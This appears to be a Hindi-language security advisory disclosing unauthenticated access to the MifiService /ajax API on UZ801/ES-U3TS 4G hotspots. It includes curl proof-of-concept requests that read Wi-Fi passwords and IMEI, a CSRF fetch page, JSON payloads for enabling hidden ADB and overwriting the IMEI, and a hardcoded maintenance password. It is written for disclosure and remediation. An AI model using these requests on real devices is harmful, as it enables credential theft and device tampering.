
सुरक्षा सलाह जो UZ801/ES-U3TS MifiService वेब API में टूटे हुए एक्सेस नियंत्रण का विवरण देती है, जो बिना प्रमाणीकरण के डेटा निष्कर्षण, कॉन्फ़िगरेशन संशोधन और डिवाइस रीबूट की अनुमति देती है। इसमें PoC और शमन उपाय शामिल हैं।
MifiService.apk द्वारा उजागर किए गए एम्बेडेड वेब प्रबंधन API में टूटे एक्सेस नियंत्रण मुद्दे के लिए सुरक्षा सलाह और तकनीकी नोट्स, जो OEM / व्हाइट-लेबल UZ801_v2.1 4G LTE मोबाइल वाई-फाई प्लेटफ़ॉर्म पर पाया गया है, जिसे ES-U3TS के रूप में भी विपणन किया जाता है।
यह रिपॉजिटरी समन्वित प्रकटीकरण और CVE असाइनमेंट का समर्थन करने के लिए है। यह प्रतिलिपि योग्य, गैर-हथियारीकृत तकनीकी साक्ष्य पर केंद्रित है।
प्रभावित डिवाइस निम्नलिखित पते पर Jetty-आधारित HTTP प्रबंधन एंडपॉइंट उजागर करता है:
http://192.168.100.1/ajax
बैकएंड अनुरोध डिस्पैचर निम्नलिखित में लागू किया गया है:
com.mifiservice.server.AjaxSevlet
हालाँकि वेब UI एक लॉगिन पृष्ठ प्रस्तुत करता है, बैकएंड अधिकांश प्रबंधन कार्यों के लिए एक मान्य प्रमाणित सर्वर-साइड सत्र लागू नहीं करता है। परिणामस्वरूप, आसन्न नेटवर्क पर एक हमलावर बिना प्रमाणीकरण के सीधे संवेदनशील funcNo ऑपरेशनों को लागू कर सकता है।
सत्यापित प्रभाव में शामिल हैं:
स्थैतिक विश्लेषण द्वारा अतिरिक्त उच्च-जोखिम वाले कार्यों की पुष्टि की गई, जिनमें शामिल हैं:
परीक्षण किया गया हार्डवेयर एक OEM / व्हाइट-लेबल डिवाइस परिवार से संबंधित प्रतीत होता है। सटीक मूल विकास विक्रेता वर्तमान में अज्ञात है, और अब तक कोई विश्वसनीय विक्रेता सुरक्षा संपर्क की पहचान नहीं की गई है।
इसलिए यह सलाह निम्नलिखित उत्पाद नामकरण का उपयोग करती है:
UZ801_v2.1ES-U3TSUZ801-V3.4.3MifiService.apkcom.mifiservice.helloयदि अतिरिक्त ब्रांड या पुनर्विक्रेता समान फर्मवेयर, APK, वेब संपत्तियाँ, और funcNo व्यवहार भेजते पाए जाते हैं, तो उन्हें उसी कोडबेस के संभावित प्रभावित वेरिएंट के रूप में माना जाना चाहिए।
/ajax वेब API एंडपॉइंटMifiService.apkcom.mifiservice.server.AjaxSevletयह मुख्य रूप से डिफ़ॉल्ट-क्रेडेंशियल मुद्दा नहीं है।
मूल कारण बैकएंड API में टूटा एक्सेस नियंत्रण है:
Origin सत्यापन मौजूद नहीं हैReferer सत्यापन मौजूद नहीं हैलॉगिन फ़ंक्शन मौजूद है, लेकिन यह अधिकांश प्रबंधन API के लिए सार्थक प्राधिकरण सीमाएँ प्रदान नहीं करता है।
प्राथमिक हमला वेक्टर:
द्वितीयक हमला वेक्टर:
यह डिफ़ॉल्ट रूप से इंटरनेट-एक्सपोज़्ड रिमोट हमला नहीं है। हमलावर को या तो:
192.168.100.1 तक सीधी लेयर 2 / लेयर 3 पहुँच होनी चाहिए, यानीचे दिए गए सभी निष्कर्ष समान टूटे एक्सेस नियंत्रण मुद्दे की प्रभावित कार्यक्षमता के रूप में शामिल हैं।
जहाँ प्रासंगिक हो, प्रत्येक आइटम को स्पष्ट रूप से निम्नलिखित में से एक के रूप में चिह्नित किया गया है:
लाइव सत्यापितस्थैतिक विश्लेषण द्वारा पुष्टियह अंतर सटीकता के लिए संरक्षित है। उच्च-जोखिम वाली कार्यक्षमता को लाइव-परीक्षण के रूप में गलत लेबल नहीं किया गया है जब इसे जानबूझकर सार्वजनिक हार्डवेयर पर निष्पादित नहीं किया गया था।
| funcNo | विवरण | स्थिति | नोट्स |
|---|
लेखन के समय, डिवाइस असंगत या अनुपस्थित ब्रांडिंग के साथ OEM / पुनर्विक्रेता चैनलों के माध्यम से बेचा जाता प्रतीत होता है, और कोई भरोसेमंद मूल विकास विक्रेता संपर्क स्थापित नहीं किया गया है।
नीचे दिए गए उदाहरण जानबूझकर केवल-पढ़ने या कम-प्रभाव वाले सत्यापन तक सीमित हैं। इन्हें हथियारीकृत शोषण वर्कफ़्लो प्रदान किए बिना भेद्यता प्रदर्शित करने के लिए शामिल किया गया है।
curl -s \
-H "Content-Type: application/json" \
-d '{"funcNo":1002}' \
http://192.168.100.1/ajax
अपेक्षित व्यवहार:
ssid शामिल हैpwd स्पष्ट पाठ में शामिल हैcurl -s \
-H "Content-Type: application/json" \
-d '{"funcNo":1029}' \
http://192.168.100.1/ajax
अपेक्षित व्यवहार:
imei शामिल हैfwversion शामिल हैवर्तमान भाषा पढ़ें:
curl -s \
-H "Content-Type: application/json" \
-d '{"funcNo":1030}' \
http://192.168.100.1/ajax
भाषा सेट करें:
curl -s \
-H "Content-Type: application/json" \
-d '{"funcNo":1031,"Language":"Chinese"}' \
http://192.168.100.1/ajax
बाद में मूल मान पुनर्स्थापित करें।
यह एंडपॉइंट सत्र स्थिति या Origin / Referer सत्यापन लागू नहीं करता है। इसलिए जुड़े पीड़ित ब्राउज़र का दुरुपयोग पृष्ठभूमि अनुरोध भेजने के लिए किया जा सकता है।
न्यूनतम प्रदर्शन पृष्ठ:
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({funcNo: 1002})
});
</script>
यह उदाहरण जानबूझकर केवल-पढ़ने वाले फ़ंक्शन नंबर तक सीमित है। इसे उपयोगकर्ताओं या उत्पादन डिवाइसों के विरुद्ध तैनात न करें।
निम्नलिखित JSON प्रारूप केवल रक्षात्मक विश्लेषण और ट्राइएज के लिए प्रलेखित हैं। इनके साथ यहाँ निष्पादन चरण शामिल नहीं हैं।
2001 - छिपे डिबग इंटरफ़ेस सक्षम करें{"funcNo":2001}
कोड में देखा गया व्यवहार:
setprop persist.sys.usb.config rndis,serial_smd,diag,adb निष्पादित करता हैsync निष्पादित करता है2004 - IMEI ओवरराइट पथ{"funcNo":2004,"imei":"<redacted-test-value>"}
कोड में देखा गया व्यवहार:
AT+WRIMEI=<value> के समतुल्य पथ कॉल करता हैकानूनी, अनुपालन, और डिवाइस-अखंडता चिंताओं के कारण यहाँ कोई सार्वजनिक लाइव परीक्षण शामिल नहीं है।
1002 के लिए उदाहरण बिना प्रमाणीकरण प्रतिक्रिया{
"results": [
{
"dns1": "8.8.8.8",
"ssid": "4G-UFI-8E1",
"dns2": "8.8.8.8",
"mask": "255.255.255.0",
"pwd": "1234567890",
"wlan_ip": "192.168.100.1",
"IP": "192.168.100.1"
}
],
"error_info": "none",
"flag": "1"
}
1029 के लिए उदाहरण बिना प्रमाणीकरण प्रतिक्रिया{
"results": [
{
"manufacture": "Qualcomm Technology",
"dbm": "",
"fwversion": "V3.4.3",
"imei": "863993064154463"
}
],
"error_info": "none",
"flag": "1"
}
यह मुद्दा एक मजबूत CVE उम्मीदवार है क्योंकि यह:
सुझाया गया वर्गीकरण:
CWE-306 महत्वपूर्ण फ़ंक्शन के लिए लापता प्रमाणीकरणCWE-862 लापता प्राधिकरणसुझाया गया CVSS:
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2026-05-112026-05-122026-05-122026-05-12funcNo अनुरोधों को अस्वीकार करेंOrigin और Referer सत्यापित करेंयह रिपॉजिटरी रक्षात्मक अनुसंधान, भेद्यता प्रकटीकरण, और समन्वय के लिए है। सार्वजनिक उदाहरण जानबूझकर कम-जोखिम सत्यापन तक सीमित हैं। उच्च-जोखिम कार्यक्षमता केवल उपचार और CVE ट्राइएज के लिए आवश्यक सीमा तक प्रलेखित है।
| funcNo | विवरण | स्थिति | नोट्स |
|---|
1002 | SSID, डिवाइस IP, DNS, वाई-फाई पासवर्ड पढ़ें | लाइव सत्यापित | वाई-फाई पासवर्ड स्पष्ट पाठ में लौटाता है |
1009 | वाई-फाई एन्क्रिप्शन मोड और पासवर्ड पढ़ें | लाइव सत्यापित | वाई-फाई पासवर्ड स्पष्ट पाठ में लौटाता है |
1011 | DHCP रेंज, DNS, क्लाइंट सूची पढ़ें | लाइव सत्यापित | स्थानीय टोही के लिए उपयोगी |
1015 | SIM स्थिति पढ़ें | लाइव सत्यापित | SIM स्थिति लौटाता है |
1029 | IMEI, फर्मवेयर, निर्माता, सिग्नल जानकारी पढ़ें | लाइव सत्यापित | संवेदनशील डिवाइस पहचान लौटाता है |
1052 | MAC फ़िल्टर मोड और कॉन्फ़िगर की गई प्रविष्टियाँ पढ़ें | लाइव सत्यापित | नीति और कॉन्फ़िगर किए गए स्लॉट लीक करता है |
2002 | सक्रिय SIM स्लॉट पढ़ें | लाइव सत्यापित | रनटाइम स्थिति उजागर करता है |
| funcNo | विवरण | स्थिति | नोट्स |
|---|
1004 | कनेक्शन मोड बदलें | स्थैतिक पुष्टि | कोई सत्र प्रवर्तन नहीं देखा गया |
1005 | पसंदीदा नेटवर्क मोड बदलें | स्थैतिक पुष्टि | उच्च परिचालन प्रभाव |
1007 | SSID / अधिकतम स्टेशन संख्या बदलें | स्थैतिक पुष्टि | कॉन्फ़िग स्थायी करता है और AP लॉजिक पुनः आरंभ करता है |
1010 | वाई-फाई एन्क्रिप्शन मोड / पासवर्ड बदलें | स्थैतिक पुष्टि | उच्च गोपनीयता प्रभाव |
1012 | DHCP/DNS-संबंधित सेटिंग्स बदलें | स्थैतिक पुष्टि | स्थानीय नेटवर्क छेड़छाड़ |
1016/1017/1018 | APN प्रोफ़ाइल पढ़ें / सेट करें / स्विच करें | स्थैतिक पुष्टि | WAN व्यवहार संशोधन |
1031 | भाषा बदलें और स्थायी करें | लाइव सत्यापित | लेखन पहुँच के कम-जोखिम प्रमाण के रूप में उपयोग किया गया |
1053/1054/1055 | MAC फ़िल्टर व्यवहार और प्रविष्टियाँ बदलें | स्थैतिक पुष्टि | नेटवर्क एक्सेस नियंत्रण छेड़छाड़ |
| funcNo | विवरण | स्थिति | नोट्स |
|---|
1013 | डिवाइस रिबूट करें | लाइव सत्यापित | DoS / सेवा व्यवधान |
1014 | ऐप/नेटवर्क कॉन्फ़िग रीसेट करें और रिबूट करें | लाइव सत्यापित | पूर्ण Android userdata मिटाना नहीं |
2000 | बूटलोडर पर रिबूट करें | लाइव सत्यापित | उच्च परिचालन प्रभाव |
2001 | छिपा ADB/Diag USB कॉन्फ़िग सक्षम करें और रिबूट करें | स्थैतिक पुष्टि | खतरनाक रखरखाव पथ |
2003 | छिपा रखरखाव पासवर्ड पथ | स्थैतिक पुष्टि | हार्डकोडेड admin8888 का उपयोग करता है; व्यवहार आंशिक / अवशिष्ट प्रतीत होता है |
2004 | IMEI ओवरराइट करें | स्थैतिक पुष्टि | AT कमांड पथ कॉल करता है; सार्वजनिक रूप से निष्पादित नहीं किया गया |